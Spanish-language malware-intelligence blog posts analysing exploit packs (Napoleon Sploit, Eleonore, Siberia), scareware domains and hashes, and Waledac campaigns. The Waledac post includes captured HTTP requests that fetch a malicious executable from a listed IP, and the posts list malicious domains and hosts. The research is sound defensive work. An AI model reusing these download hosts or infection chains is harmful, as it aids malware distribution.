Napoleon Sploit. Frameware Exploit Pack

2010-01-09T11:44:00.000-03:00

Se trata de la primera versión de un Exploit Pack para el monitoreo de botnets con propósito particular llamado Napoleon Sploit, que se lanzó al mercado clandestino de crimeware en agosto del 2009.

Debido a su prematura y baja condición de "complejo Exploit Pack" si lo comparamos con otros de su estilo, posee un bajo costo y de hecho no ha tenido repercusión en el circuito de venta underground, aunque todavía se encuentra a la venta por un costo de USD 299 con la posibilidad de obtener las actualizaciones importantes por USD 35 más.

Como podemos apreciar en la imagen, su interfaz es muy sencilla y minimalista. Sólo posee dos módulos (estadística y configuración) más el panel de autenticación (logín vía web), y según su autor, el estilo del crimeware con colores claros está pensado para no provocar cansancio en la vista de los ciber-criminales, ~~“futuros clientes”~~.

(Sin palabras, pero espero opiniones al respecto). La siguiente imagen corresponde al panel de configuración.

El Exploit pack se encuentra diseñado para aprovechar las vulnerabilidades específicas en función de los siguientes exploits:

MDAC - IE5, IE6
Opera Telnet - Opera 9.00 - 9.27
PDF Util.Printf - PDF Adobe Reader < 8.1.2
PDF Collab.Geticon PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2

Un detalle que no quiero dejar pasar es que este crimeware es el antecesor de Siberia Exploit Pack, otra aplicación web de propósito particular desarrollada por el mismo autor que Napoleon Sploit, que se encuentra In-the-Wild.

Información relacionada
Estado del arte en Eleonore Exploit Pack
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
ZeuS Botnet y su poder de reclutamiento zombi
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware para el control de botnets

Jorge Mieres

Una recorrida por los últimos scareware XX

2010-01-09T11:00:00.000-03:00

Anti-Virus Live 2010 = Anti-Virus Elite 2010, ErrorClean y NoAdware
MD5: c50dc619e13345dec2444b0de371dfd4
IP: 204.232.131.12
204.232.131.14
United States Hoboken Noadware.net
Dominios asociados
antivirus-live.com
Result: 9/41 (21.95%)

NoMalware
IP: 88.214.204.221 - 72.9.100.114
United Kingdom Hosting Solutions Ltd
United States New York Access Integrated Technologies Inc
Dominios asociados
ontogen.com
nomalwares.org
nomalwarelab.com

Malware Mechanic
MD5: ce48aeb8e8b007b601a7f584d1b7901c
IP: 72.9.100.115
United States New York Access Integrated Technologies Inc
Dominios asociados
malwaremechanic.com

newsneg.ru, back-shure.ru, year-sneg.ru, yearsneg.ru, night-up.ru, nightup.ru, snegyear.ru, sneg-new.ru, up-day.ru, (91.213.29.15) - Russian Federation Info-media Ltd
world-info2.com (193.104.22.202) - Malta Kratosweb-net
anyboom.biz (88.214.204.236) - United Kingdom Hosting Solutions Ltd
sekuritylistsite.com (94.102.63.245) - Netherlands Amsterdam The King Host
online-antispym2.com (68.168.212.142) - United States Secaucus Honelive
bestsekuritylist.com (193.169.234.3) - Jamaica Titan-net Ltd
coolsecuritylist.com (212.150.107.40) - Israel Tel Aviv Loads

Información relacionada
Una recorrida por los últimos scareware XIX
Una recorrida por los últimos scareware XVIII
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XVI
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VI I I
Una recorrida por los últimos scareware VI I
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware

Jorge Mieres

El crimeware durante el 2009

2010-01-05T08:00:00.000-03:00

"El crimeware durante el 2009" plasma en un solo documento todo lo que se canalizó a través de este blog durante el año en cuestión en materia de crimeware y amenazas asociadas.

Cuenta con un total de 262 páginas y se encuentra dividido por las temáticas más relevantes que describen las actividades delictivas que fueron motivo de noticias en este blog. Posee dos índices que permiten encontrar las noticias de forma sencilla (índice de contenido), y otro sobre las imágenes (índice de imágenes).

A continuación dejo alguna de las temáticas que encontraran en el documento en cuestión:

Panorama actual de negocio ocasionado por crimeware
Framework Exploit Pack para botnets de propósito general
Framework Exploit Pack para botnets de propósito particular
Servicios asociados al crimeware
Inteligencia en la lucha contra el crimeware
Campañas de propagación e infección
Otros Exploits Pack que se investigaron

Información
Malware Intelligence
Compendio anual de información. El crimeware durante el 2009
262 páginas
Idioma español

Descarga

Jorge Mieres

Crimeware-as-a-Service y mecanismos de evasión antivirus

2010-01-04T09:00:00.000-03:00

Los modelos de negocio que ofrece el Cloud Computing no son novedosos. Incluso, muchos servicios que en la actualidad se ofrecen bajo esta bandera poseen un modelo ya implantado hace mucho tiempo en el mercado.

Sin embargo, el concepto Cloud Computing en sí mismo que conocemos en la actualidad responde a una orientación netamente inclinada a generar negocios aprovechando Internet como infraestructura, lo cual en un mercado altamente competitivo goza de ciertas ventajas con respecto al negocio convencional.

Bajo este escenario, lo cierto es que esta manera de crear negocios también fue aceptada y puesto en marcha por quienes cotidianamente lucran a través de una batería de programas diseñados con fines fraudulentos que cuando son utilizados a través de Internet, reciben el término de Crimeware-as-a-Service, o también por su acrónimo CaaS.

De esta manera comienzan a gestarse servicios fraudulentos que buscan automatizar la manipulación de malware en un proceso creado exclusivamente para evadir su detección. Un ejemplo de esto lo es el servicio (que hoy ya no existe), llamado PoisonIvy Polymorphic Online Builder, creado para cifrar malware y del cual hablamos en su momento. En este caso, al manipular solamente códigos maliciosos, este tipo de servicio se aglomera bajo el término de Malware-as-a-Service (MaaS).

Del mismo modo, en la actualidad existen servicios desarrollados con fines de lucro y destinados a alimentar el negocio del crimeware a través de mecanismos que permiten verificar el grado de efectividad del malware frente a los motores de detección antivirus.

Estos servicios constituyen el antónimo de otros altamente empleados por los profesionales de seguridad como por ejemplo VirusTotal de la compañía español Hispasec. Sobre uno de ellos también ya hemos hablado, llamado VirTest.

Sin embargo, existen algunos otros como Private antivirus service (creado en el 2008), que al igual que VirTest es de origen ruso y busca obtener un beneficio económico a través de un servicio pago, pero al mismo tiempo colaborar con el ambiente del ciber-crimen ofreciendo la posibilidad de chequear el malware creado para conocer su índice de detección en determinado momento, asegurándose además, que el binario no será compartido con las compañías antivirus. De esta manera, se asegura el anonimato y un ciclo de vida más prolongado para la amenaza.

El servicio fraudulento permite verificar la efectividad del malware frente a 17 motores de los antivirus más conocidos del mercado antimalware, y como se visualiza en la primera captura, existen tres costos en función de la característica de los "contratado":

USD 0.2 por chequeo
USD 15 por 10 chequeos limitados diariamente
USD 20 por chequeos sin límites

Una vez dentro del sistema, desde la solapa AV check, se suben los binarios que serán sometidos al escaneo de los antivirus, ofreciendo luego el reporte y un historial de los archivos subidos. Estas opciones se encuentran en el ángulo inferior izquierdo.

Un aspecto interesante que ofrece este servicio de crimeware, lo constituye la posibilidad de programar tareas de verificación, a través de la segunda solapa llamada Programador.

Esta opción permite, por un lado, subir un archivo malicioso desde el disco duro del creador del malware; y por el otro, seleccionar un malware que ya se encuentre en el circuito de propagación a través de la URL; es decir, que el ciber-delincuente puede verificar y controlar la detección de o los códigos maliciosos que ya este propagando.

De esta forma y a través del "programador", se planifica la frecuencia de chequeo de los códigos maliciosos subidos en función de una serie de parámetros que se eligen según un tiempo establecido que van en el rango de 3, 6, 12 horas, ó 1 y 3 días.

Estos parámetros son configurables y una vez establecido pueden ser visualizados en una tabla que se muestra en la misma ventana. La tercera columna corresponde al rango de tiempo. También se configura la manera en que desplegará una alerta con el reporte, que puede ser a través de un correo electrónico o a través de ICQ.

Claramente estas opciones están ideadas pensando en agilizar las maniobras delictivas de propagación de malware chequeando, en el menor de los tiempos, cada 3 horas para verificar si la amenaza es detectada por las compañías antivirus. Esto permite cambiar el malware cada vez que sea necesario, y hasta combinar el servicio con otros como por ejemplo el "servicio" mencionado líneas arriba para cifrar los archivos.

Evidentemente quienes forman parte de la cadena delictiva del negocio del crimeware, colaboran entre sí por intermedio de diferentes alternativas, conformando también un negocio paralelo que también se nutre de las actividades delictivas.

Información relacionada
Servicio ruso en línea para comprobar la detección de malware
Software as a Service en la industria del malware
Creación Online de malware polimórfico basado en PoisonIvy

Jorge Mieres

Estado del arte en Eleonore Exploit Pack

2010-01-03T08:00:00.000-03:00

Desde el lanzamiento de la primera versión, en junio del 2009, Eleonore Exploit Pack goza de un importante impacto en el ámbito criminal, tanto desde la demanda de obtener el Exploit Pack debido a su costo competitivo respecto a las aplicaciones web similares, como por su alto índice de actividad.

Actualmente cuenta con un repertorio de 6 (seis) versiones, siendo la última la 1.3.2, de reciente aparición en la escena underground a un costo de USD 1000.

Esto significa que su autor, ExManoize, fue actualizando el paquete aproximadamente cada mes, lo que da una idea concreta del esfuerzo depositado en su desarrollo, y que obviamente no es por vocación sino que responde y forma parte del negocio fraudulento, colaborando con la creación y mantenimiento de una de las "herramientas" utilizadas en el campo delictivo.

La estructura de este crimeware es bastante compleja y cuenta con un repertorio total de 13 (trece) exploits por defecto que se incluyen en el paquete y que son los siguientes:

MDAC. Funciona en MSIE
MS009-02. Funciona en MSIE
ActiveX pack. Funciona en MSIE
compareTo. Funciona en Firefox
JNO (JS navigator Object Code). Funciona en Firefox
MS06-006. Funciona en Firefox
Font tags. Funciona en Firefox
Telnet. Funciona en Opera
PDF collab.getIcon. Funciona en todos los navegadores
PDF Util.Printf. Funciona en todos los navegadores
PDF collab.collectEmailInfo. Funciona en todos los navegadores
PDF Doc.media.newPlayer. Funciona en todos los navegadores
Java calendar. Funciona en todos los navegadores

Obviamente, como todo servicio que se ofrece dentro de un modelo de mercado, y el crimeware lo es incluyendo este, el "prestador" garantiza el soporte, las actualizaciones y limpieza del paquete en caso de ser necesario. ¡Todo un negocio!

Desde el punto de vista histórico, las actualizaciones de Eleonore Exploit Pack son las siguientes:

En junio de 2009 se pone a disposición del público la venta de Eleonore Exploit Pack v1.0, conteniendo los exploits para MDAC, MS009-02, Snapshot, Telnet (para opera), PDF collab.getIcon, PDF Util.Printf, PDF collab.collectEmailInfo. Su valor fue, en principo, de USD 599.
En julio de 2009 se actualiza a la versión 1.1 y se agregan dos exploits más: Font tags que explota en Firefox 3.5 y DirectX DirectShow que explota en IE 6 y 7. Además, se realizan mejoras en el cifrado de los scripts. Su valor fue de USD 500, y la versión anterior bajo el precio a USD 300.
Durante el mismo mes de julio, se agrega el exploit Spreadsheet, se modifican los archivos PDF, se elimina la captura de imágenes y se agrega la capacidad de cargar un archivo a través del propio panel de administración. La versión es denominada 1.2 y su costo se establece en USD 700.
Luego de un periodo de tres meses sin actualizaciones, en octubre aparece la versión 1.3, incorporando en el paquete más funcionalidades fraudulentas. Entre ellas, algunas "mejoras" en los exploits para Internet Explorer y se agrega Java D&E. EL costo de esta versión fue de USD 1000.
En noviembre comienza la comercialización de la versión 1.3.1, donde se continúan puliendo los exploits y, entre otros, se agrega el archivo Robots.txt para mejorar el indexado y evitar que ciertas carpetas se muestren. El precio se mantuvo en USD 1000.
Durante este periodo de tiempo, se podía encontrar In-the-Wild una versión beta privada (1.3B).
El 16 de diciembre, aparece la última versión, 1.3.2 que agrega Java calendar y un Exploit para la reciente vulnerabilidad PDF Doc.media.newPlayer, que hasta ese entonces se trataba de un 0-Day. Su valor no se modificó.

Desde el punto de vista del empleador, la infraestructura para manejar el negocio de las botnets consiste en armarla y ponerla en funcionamiento a través de un servidor dedicado que también puede ser contratado. Sin embargo, para obtener el beneficio económico se necesita de las zombis, ya que sin ellas no se podrían optimizar las tareas fraudulentas para las cueles están pensadas. De hecho, que el paquete se actualice con bastante regularidad, demuestra que los réditos que se obtienen a través de estas actividades son importantes.

Por otro lado, independientemente del costo que posee el crimeware, existen "servicios extras" ofrecidos por el desarrollador, que no están incluidos en el paquete original, como por ejemplo, la limpieza de la botnet por un costo USD 50, al igual que el cambio de dominio malicioso por el mismo valor, USD 50.

Alternativamente, los botmaster (que no necesariamente son los desarrolladores de la aplicación web) suelen alquilar su botnet de forma parcial, y en el caso de Eleonore Exploit Pack v1.3.2, su alquiler es de USD 40 por día.

Información relacionada
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
DDBot. Más gestión de botnets vía web
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Hybrid Botnet Control System. Desarrollo de http bot en perl
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
TRiAD Botnet III. Administración remota de zombis multiplataforma
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Jorge Mieres

Waledac. Línea de tiempo '07-'09

2010-01-02T08:00:00.000-03:00

El troyano waledac, encargado de reclutar zombis para alimentar una botnet dedicada al spam, recientemente volvió a dar noticia al utilizar como excusa la llegada del nuevo año 2010.

Sin embargo, sus actividades fraudulentas datan desde el año 2007 cuando se lo conoció bajo la nomenclatura de storm, y desde entonces, esta familia de malware se ha aprovechado de Ingeniería Social como principal estrategia de propagación bajo diversas coberturas.

La presente línea de tiempo abarca desde las primeras actividades de Ingeniería Social hasta la última y recientemente conocida, relacionda al inicio del 2010.

Información relacionada
Waledac vuelve con otra estrategia de ataque
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te ~~amo~~ gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Waledac vuelve con otra estrategia de ataque

2010-01-01T18:26:00.000-03:00

Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.

Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.

A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.

Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.

Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.

Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html

En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.

Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac ha vuelto con una nueva excusa, aunque a juzgar por el porcentaje de actividad que posee el servidor donde se encuentra alojado, todo indica que siempre se mantuvo latente con actividades muy esporádicas. Incluso, teniendo en cuenta la estructura de carpetas desde la cual se descarga, parecería haber una relación directa con otra amenaza bastante conocido que es Bredolab, y a la cual aparentemente también asocian con algunos scareware y ZeuS.

Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te ~~amo~~ gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Compendio mensual de información. Diciembre 2009

2009-12-31T08:00:00.000-03:00

Pistus Malware Intelligence - English version

28.12.09 Exploit Pack y su relación con el rogue
27.12.09 Testimonios sobre scareware y estrategia de credibilidad
25.12.09 Siberia Exploit Pack. Otro paquete de explois In-the-Wild
24.12.09 Anti-Virus Live 2010. Chateando con el enemigo
20.12.09 Una recorrida por los últimos scareware XIX
15.12.09 RussKill. Aplicación para realizar ataques de DoS
09.12.09 Fusión. Un concepto adoptado por el crimeware actual II
05.12.09 Campaña de desinformación para propagar malware
03.12.09 Una breve mirada al interior de Fragus
01.12.09 Campaña de propagación de Koobface a través de Blogspot

Malware Disasters Team - A division of Malware Intelligence
26.12.09 Desktop Hijack by Internet Security 2010. Your System Is Infected!
14.12.09 LockScreen. Your computer is infected by Spyware!!!
13.12.09 Waledac/Storm. Past and present a threat
13.12.09 Symbiosis malware present. Koobface
05.12.09 Swizzor reload. Adware and control of P2P networks

Evil Fingers Blog
25.12.09 Anti-Virus Live 2010. Talking with the enemy
17.12.09 RussKill. Application to perform denial of service attacks
10.12.09 Fusion. A concept adopted by the current crimeware II
06.12.09 Disinformation campaign to spread malware
04.12.09 A brief glance inside Fragus
01.12.09 Koobface campaign spread through Blogspot

Offensive Computing
27.12.09 Siberia Exploit Pack. Another package of explois In-the-Wild
17.12.09 RussKill. Application to perform denial of service attacks
05.12.09 DDoS Botnet. New crimeware particular purpose

ESET Latinoamérica Blog
29.12.09 ZeuS utiliza el nombre de ESET NOD32 para reclutar zombis
24.12.09 Vuelven a dar batalla dos conocidos adware
23.12.09 Neon Exploit System. Un viejo crimeware aún In-the-Wild
12.12.09 ZeuS utiliza el nombre de Amazon para reclutar zombis
03.12.09 Entrevista sobre el spam
02.12.09 Koobface vuelve al ataque en navidad

Información relacionada
Compendio mensual de información 2009

Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Jorge Mieres

Exploit Pack y su relación con el rogue

2009-12-28T08:00:00.000-03:00

Las actividades fraudulentas poseen relación entre sí a través de "asociados" de negocio en el cual cada uno de ellos oficia a modo de célula dentro de una misma estructura orgánica, complementando así una empresa dedicada a tales actividades ilícitas.

En este sentido, el rogue (también denominado scareware), cuenta con un volumen importante de "afiliados" que se encargan de la distribución de los códigos maliciosos. De hecho, un reciente estudio del FBI señaló que las perdidas estimativas a causa del rogue ascienden a USD 150 millones.

Esto demuestra por qué todas aquellas viejas estrategias de Ingeniería Social que muchas veces dejan una sensación de trivialidad aún hoy son muy efectivas; y por qué muchos profesionales del ámbito criminal, que buscan ampliar las actividades delictivas y sus ganancias, migran sus esfuerzos en combinar las estrategias de diseminación con técnicas del tipo BlackHat SEO e incluso, con Exploits Pack como en este caso.

Un caso concreto es el Exploit Pack de reciente aparición denominado Siberia Exploit Pack que dentro de su estructura incorpora un archivo llamado file.exe. Cuando el usuario accede a uno de los dominios utilizados por el crimeware, un exploit (generalmente a través de archivos pdf) se encarga de explotar determinada vulnerabilidad, descargar un malware desde un dominio preestablecido y ejecutarlo.

Una vez que el malware infecta el sistema, realiza un Desktop Hijack mostrando la advertencia de una infección a través del mensaje "YOUR SYSTEM IS INFECTED!".

Luego de ello, el sistema comienza a desplegar ventanas emergentes (característica propia del adware) convirtiendo el sistema en el nido del rogue y punto de referencia de una botnet. Sin embargo, independientemente de la infección, esas ventanas emergentes forman parte de la campaña de engaño y de acción psicológica del malware.

Por un lado, porque el supuesto antivirus instalado lejos de solucionar los problemas, los empeora descargando más códigos maliciosos o abriendo los puertos para que accedan otras amenazas. Por otro lado, porque las advertencias de infección, además de ser agresivas, son completamente falsas, y el objetivo es "asustar" al usuario para que termine "comprando" el falso antivirus.

Información relacionada
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
Anti-Virus Live 2010. Chateando con el enemigo
Una recorrida por los últimos scareware XIX
Scareware. Estrategia de engaño propuesta por Personal Antivirus
Campaña de propagación del scareware MalwareRemovalBot

Jorge Mieres

Testimonios sobre scareware y estrategia de credibilidad

2009-12-27T08:00:00.000-03:00

Una de las estrategias utilizadas por los propagadores de scareware (rogue) es intentar atraer la confianza de los usuarios a través de "testimonios" supuestamente realizados por personas que ya habrían adquirido la "solución" y que por intermedio de estos manifiestan su "gran satisfacción por el mismo".

Sin embargo, sabemos muy bien que sólo es parte de un engaño que busca complementar la estrategia general de propagación/infección, y que si instalamos ese programa vamos a terminar con el sistema infectado por un scareware. En consecuencia, ¿no se preguntan quienes son los que afirman la eficacia de esta falsa herramienta antivirus?

En función de la imagen, donde debajo de cada frase aparece el supuesto nombre (incompleto) del responsable de la misma, quizás podamos deducir que se trata de las señoras y señores:

• Dave C. = Dave Conficker
• Beth P. = Beth Phoenix
• Lisa W. = Lisa Waledac
• Melissa H. = Melissa Hupigon
• Paul M. = Paul Mebroot
• Jason C. = Jason Crum
• Pat J. = Pat Justexploit
• Matt E. = Matt Eleonore
• Roger F. = Roger Fragus
• Sam P. = Sam Piosonivy
• Jamie V. = Jaime Virut
• Tracey K. = Tracey Koobface
• Brian A. = Brian Adrenaline
• Sally V. = Sally Virtumonde
• John R. = John Ransomware
• Lauren R. = Lauren Rustock

El malware siempre tomando "personalidades" como estrategia y cobertura donde sólo ellos podrían hablar maravillas de un colega fraudulento ;-P

Información relacionada
Anti-Virus Live 2010. Chateando con el enemigo
Una recorrida por los últimos scareware XIX
Campaña de desinformación para propagar malware
Campaña de propagación de Koobface a través de Blo...

Jorge Mieres

Siberia Exploit Pack. Otro paquete de explois In-the-Wild

2009-12-25T23:27:00.000-03:00

Siberia Exploit Pack es un nuevo paquete destinado a explotar vulnerabilidades y reclutar zombis originario, como es fácil de deducir por su nombre y como es habitual en este rubro del negocio clandestino de crimeware, de Rusia. Fue lanzado al mercado casi de forma conjunto con RussKill, una botnet de propósito particular también de reciente aparición.

Por el momento, la venta de Siberia Exploit Pack es cerrada. Las versiones que se comparten en algunos servidores fraudulentos son privadas y su compra sólo es accesible por intermedio de "garantes"; es decir, otros delincuentes (generalmente botmaster, spammers, phishers, etc.) que recomiendan a determinada persona que desea comprar el paquete.

De esta manera se mantiene un determinado control y nivel de confianza entre los desarrolladores del Exploit Pack y sus compradores. Esto también explica por qué del ciclo cerrado en cuanto a su utilización.

La estructura de este crimeware se compone de varios archivos php y un pack de exploits predeterminados. Entre los archivos php se destacan:

stat.php: es el panel de acceso a la administración vía http.
index.php: contiene un elemento “refresh” que genera un refresco continuo redireccionando a Google.
exe.php: contiene las instrucciones para la descarga un binario llamado por defecto file.exe y además contiene un script que redirecciona a un exploit para MDAC contenido en el archivo mdac.php. En función del parámetro que se pase al php descarga también archivos pdf.
config.php: contiene los parámetros de configuración del paquete. Se encuentra en la carpeta por defecto llamada inc.

Los archivos que se diseminan a través de este pack y explotando otras vulnerabilidades son:

file.exe (md5:4217e91f65c325c65f38034dc9496772). Detección de 25/40 (62.50%)
2061.pdf (md5:508f439b4a38c88e5f8860ef07250a95). Detección de 12/40 (30%)
97275.pdf (md5:1463de6950dd663731e5501a5658d0b8). Detección de 10/40 (25%)

En este caso, ambos archivos pdf (cuyo nombres los crea de forma aleatoria) explotan las vulnerabilidades CVE-2007-5659 (Adobe Collab overflow); CVE-2008-2992 (Adobe util.printf overflow); CVE-2009-0927 (Adobe getIcon). Mientras que el archivo file.exe crea otro llamado winlogon86.exe (md5:4217e91f65c325c65f38034dc9496772 ).

La "moda" de los paquetes de exploit no termina y parecería que la categorización de "moda", ya le queda chico.

Desde que se comenzó a masificar la utilización de los Exploits Pack (mediados del 2007), son muchas las alternativas de este estilo, tanto de propósito general como de propósito particular, que se ofertan a través de un mercado clandestino mediante el cual no solo se retro-alimenta el negocio del malware con "recursos" eficaces y sencillos (en este caso Siberia Exploits Pack) que se adaptan a sus necesidades delictivas sin mayores esfuerzos, sino que el mismo desarrollo de crimeware como los exploit pack, conjuntamente con las botnets que permiten crear y administrar, constituye un eslabón importante en la cadena delictiva que difícilmente los caber-criminales dejen a un costado.

Esto, evidentemente da una idea lo suficientemente concreta como para entender que estamos frente acciones y estrategias de "negocio" sostenida por profesionales en materia de delitos informáticos.

Información relacionada
RussKill. Aplicación para realizar ataques de DoS
DDoS Botnet. Nuevo crimeware de propósito particular
JustExploit. Nuevo Exploit Kit que explota Java
ZoPAck. Nueva alternativa para la explotación de v...
ZeuS Botnet y su poder de reclutamiento zombi
Automatización en la creación de exploits

Jorge Mieres

Anti-Virus Live 2010. Chateando con el enemigo

2009-12-24T02:26:00.000-03:00

Generalmente se tiene la falsa creencia de que los códigos maliciosos constituyen problemas triviales que cualquier técnico soluciona con solo formatear el sistema o adquirir alguno de los reconocidos antimalware que ofrece el mercado antivirus de la actualidad.

Sin embargo, por un lado, la realidad es que detrás del desarrollo de malware se esconde un negocio grandísimo en el cual día a día se suman más "asociados". Por otro lado, qué pasa cuando ese antivirus que planeamos comprar es todo lo contrario.

Este es el caso del Anti-Virus Live 2010 o lo que es lo mismo, Anti-Virus Elite 2010, un malware del tipo scareware (o rogue), que deja en completa evidencia que los procesos y mecanismos mediante los cuales se engaña a los usuarios para robarles dinero se encuentran bien aceitados y muy bien pensados.

En primera instancia, como es habitual en este tipo de amenazas, la estrategia se encuentra apoyada por una página web que es utilizada de "carnada" para atraer a las potenciales víctimas, argumentando todo tipo de justificaciones para "demostrar" cierta credibilidad en el falso antivirus, lo que complementa una típica campaña de desinformación.

Hasta el momento, nada interesante. Salvo, por la posibilidad de solicitar asistencia vía chat. Interesante. Comprobemos entonces si este condimento es legítimo… Sí, lo es.

En consecuencia, se estableció la comunicación a través de esta opción con la sorpresa de que inmediatamente obtuvimos respuesta del otro lado. A continuación se puede aprovechar la corta conversación vía chat.

Básicamente nos comentó Dennis, el negociante, que entre otras cosas el supuesto antivirus es compatible con todas las versiones de Windows, que su valor es de USD 27, que sólo soporta el idioma inglés y no existe versión para empresas y que elimina conficker sin problemas.

Analicemos brevemente estos puntos. Evidentemente, el scareware debe ser compatible con todas las versiones de Windows ya que es ese puntualmente el público al cual está orientada la amenaza. ¿Por qué? Sencillamente porque más del 80% de las personas consumen Windows como principal sistema operativo en entornos hogareños, donde la potencialidad de encontrar una víctima concreta se incrementa. De esa manera es mucho más factible "cerrar negocio".

Por esa misma razón no existe versión para GNU/Linux, incluso, ni siquiera versión orientada a empresas; ya que generalmente, las compañías cuentan con un mayor nivel de seguridad donde, probablemente, el scareware no encuentre resultados positivos.

¿Por qué inglés y no Ruso? Porque el inglés es el tercer idioma más utilizado. Su costo, USD 27, representa un valor competitivo que se encuentra acorde al costo promedio de los programas antivirus legítimos. Y con respecto a conficker, si preguntábamos por koobface, la respuesta hubiera sido la misma.

Una dato más que interesante y que ayuda a comprender en su justa medida la magnitud del negocio clandestino de malware, es el error cometido por el "afiliado" Dennis al momento de solicitarle la dirección para comprar la falsa solución. Nos ofrece la url registryfix.com/purchase y al momento de comentar que no se trata de la supuesta solución en cuestión, hace la salvedad ofreciendo la url correspondiente antivirus-elite.com/purchase.

Sin embargo, nosotros estábamos tratando de cerrar "negocio" por Anti-Virus Live 2010 y no por Anti-Virus Elite 2010, dejando en evidencia que se trata de la misma amenaza bajo nombres diferentes. Incluso, que el mismo "asociado" maneja y comercializa diferentes alternativas bajo modalidad similares. En este caso, ofreciendo también la venta fraudulenta de Registry Fix, otro scareware asociado a NoAdware y ErrorClean.

Desde un punto de vista más técnico, el dominio de esta amenaza se encuentra en la dirección IP 204.232.131.12, alojado en la ISP Rackspace, ubicada en la ciudad de Hoboken en Estados Unidos bajo el AS27357.

Según el historial de este AS, las actividades generadas por códigos maliciosos son importantes

Desde el sitio web se descarga un ejecutable llamado setup.exe (MD5: C50DC619E13345DEC2444B0DE371DFD4) que corresponde al instalador de scareware con un bajo índice de detección.

Como podemos apreciar, los delincuentes informáticos no se cansan de propagar amenazas cada vez más agresivas que acompañan el proceso de infección a través de campañas de marketing, incluso, muy similares a las utilizadas por muchas compañías antivirus.

Información relacionada
Una recorrida por los últimos scareware XIX
Green IT utilizado para la propagación de scarewar...
Scareware. Repositorio de malware In-the-Wild
Scareware. Estrategia de engaño propuesta por Personal Antivirus
Campaña de propagación del scareware MalwareRemovalBot

Jorge Mieres

Una recorrida por los últimos scareware XIX

2009-12-20T01:08:00.000-03:00

Doctor Alex
MD5: 4f2bdddc4b71a428ec2e964cfed9f11a
IP: 69.89.20.48
United States Provo Bluehost Inc
Dominios asociados
doctor-alex.com

